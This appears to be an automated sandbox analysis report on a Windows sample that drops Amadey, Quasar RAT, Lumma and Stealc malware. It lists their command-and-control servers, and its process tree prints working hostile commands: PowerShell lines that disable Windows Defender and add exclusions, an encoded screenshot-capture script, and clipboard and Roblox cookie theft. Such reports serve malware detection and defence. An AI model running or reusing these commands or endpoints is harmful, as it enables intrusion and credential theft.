Analysis

  • max time kernel
    147s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-12-2024 21:04

General

  • Target

    file.exe

  • Size

    3.2MB

  • MD5

    8310dd77fc508989327b7242d9f00757

  • SHA1

    0f47666d19e93f838bf9e2d67a1a0c42dd2561f2

  • SHA256

    306e3f1775f8481fe89d3575b57d8bcab355e9d55d1b66cbf7b246f8bd2a3dd0

  • SHA512

    279770c1ae7698765dca0a7d4cffb6695381f8513ac12283c6e77b80cfd198d2a16c1ed12854f17ca8f91089632bbae65278bf8d157ec01fc3538cdc4416e697

  • SSDEEP

    49152:eKsUSrfMdl+qB2OAS4aNPTET48NqCnf9lZOUdcczoJ:eTUqMdQshAS4aNP58NqClPdw

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

C2

45.200.148.155:6060

Mutex

4b3820e0-d123-49d9-b51e-3c4daa4f6874

Attributes
  • encryption_key

    F8879E9B26846C57C99B6F152F74703E1CC15B8B

  • install_name

    SecurityHealthSystray.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    SecurityHealthSystray.exe

  • subdirectory

    SubDir

Extracted

Family

lumma

C2

https://impend-differ.biz/api

https://print-vexer.biz/api

https://dare-curbys.biz/api

https://covery-mover.biz/api

https://formy-spill.biz/api

https://dwell-exclaim.biz/api

https://zinc-sneark.biz/api

https://se-blurry.biz/api

https://atten-supporse.biz/api

Extracted

Family

stealc

Botnet

stok

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

lumma

C2

https://atten-supporse.biz/api

https://se-blurry.biz/api

https://zinc-sneark.biz/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 2 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 16 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 24 IoCs
  • Identifies Wine through registry keys 2 TTPs 8 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 54 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
  • UPX packed file 64 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Detects Pyinstaller 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 18 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Kills process with taskkill 5 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 51 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 33 IoCs
  • Suspicious use of SendNotifyMessage 31 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:4468
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1076
      • C:\Users\Admin\AppData\Local\Temp\1013266001\main.exe
        "C:\Users\Admin\AppData\Local\Temp\1013266001\main.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:4284
        • C:\Users\Admin\AppData\Local\Temp\1013266001\main.exe
          "C:\Users\Admin\AppData\Local\Temp\1013266001\main.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:2924
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI42842\Build.exe -pbeznogym
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1208
            • C:\Users\Admin\AppData\Local\Temp\_MEI42842\Build.exe
              C:\Users\Admin\AppData\Local\Temp\_MEI42842\Build.exe -pbeznogym
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2016
              • C:\ProgramData\Microsoft\hacn.exe
                "C:\ProgramData\Microsoft\hacn.exe"
                7⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:3096
                • C:\ProgramData\Microsoft\hacn.exe
                  "C:\ProgramData\Microsoft\hacn.exe"
                  8⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of WriteProcessMemory
                  PID:2424
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI30962\Build.exe -pbeznogym
                    9⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4280
                    • C:\Users\Admin\AppData\Local\Temp\_MEI30962\Build.exe
                      C:\Users\Admin\AppData\Local\Temp\_MEI30962\Build.exe -pbeznogym
                      10⤵
                      • Checks computer location settings
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of WriteProcessMemory
                      PID:4940
                      • C:\ProgramData\Microsoft\hacn.exe
                        "C:\ProgramData\Microsoft\hacn.exe"
                        11⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of WriteProcessMemory
                        PID:664
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI30962\Build.exe -pbeznogym
                          12⤵
                            PID:4844
                            • C:\Users\Admin\AppData\Local\Temp\_MEI30962\Build.exe
                              C:\Users\Admin\AppData\Local\Temp\_MEI30962\Build.exe -pbeznogym
                              13⤵
                              • Checks computer location settings
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              PID:2928
                              • C:\ProgramData\Microsoft\hacn.exe
                                "C:\ProgramData\Microsoft\hacn.exe"
                                14⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                PID:5204
                              • C:\ProgramData\Microsoft\based.exe
                                "C:\ProgramData\Microsoft\based.exe"
                                14⤵
                                • Executes dropped EXE
                                PID:5244
                                • C:\ProgramData\Microsoft\based.exe
                                  "C:\ProgramData\Microsoft\based.exe"
                                  15⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  PID:5508
                        • C:\ProgramData\Microsoft\based.exe
                          "C:\ProgramData\Microsoft\based.exe"
                          11⤵
                          • Executes dropped EXE
                          • Suspicious use of WriteProcessMemory
                          PID:3600
                          • C:\ProgramData\Microsoft\based.exe
                            "C:\ProgramData\Microsoft\based.exe"
                            12⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            PID:1392
                • C:\ProgramData\Microsoft\based.exe
                  "C:\ProgramData\Microsoft\based.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious use of WriteProcessMemory
                  PID:4032
                  • C:\ProgramData\Microsoft\based.exe
                    "C:\ProgramData\Microsoft\based.exe"
                    8⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of WriteProcessMemory
                    PID:740
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
                      9⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4060
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
                        10⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2012
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                      9⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1216
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        10⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4292
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ​  .scr'"
                      9⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2020
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ​  .scr'
                        10⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1068
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                      9⤵
                        PID:3488
                        • C:\Windows\system32\tasklist.exe
                          tasklist /FO LIST
                          10⤵
                          • Enumerates processes with tasklist
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1600
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                        9⤵
                          PID:3576
                          • C:\Windows\system32\tasklist.exe
                            tasklist /FO LIST
                            10⤵
                            • Enumerates processes with tasklist
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2932
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                          9⤵
                            PID:2760
                            • C:\Windows\System32\Wbem\WMIC.exe
                              WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                              10⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:5660
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                            9⤵
                            • Clipboard Data
                            PID:5044
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell Get-Clipboard
                              10⤵
                              • Clipboard Data
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:5524
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                            9⤵
                              PID:3020
                              • C:\Windows\system32\tasklist.exe
                                tasklist /FO LIST
                                10⤵
                                • Enumerates processes with tasklist
                                • Suspicious use of AdjustPrivilegeToken
                                PID:5668
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                              9⤵
                                PID:3824
                                • C:\Windows\system32\tree.com
                                  tree /A /F
                                  10⤵
                                    PID:5676
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "systeminfo"
                                  9⤵
                                    PID:4652
                                    • C:\Windows\system32\systeminfo.exe
                                      systeminfo
                                      10⤵
                                      • Gathers system information
                                      PID:5696
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                    9⤵
                                      PID:4860
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                        10⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:5688
                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\oeevtdbd\oeevtdbd.cmdline"
                                          11⤵
                                            PID:3448
                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES38BE.tmp" "c:\Users\Admin\AppData\Local\Temp\oeevtdbd\CSC62E6975524324254B2BDFE875B142F60.TMP"
                                              12⤵
                                                PID:5664
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                          9⤵
                                            PID:6136
                                            • C:\Windows\system32\tree.com
                                              tree /A /F
                                              10⤵
                                                PID:5600
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                              9⤵
                                                PID:6012
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
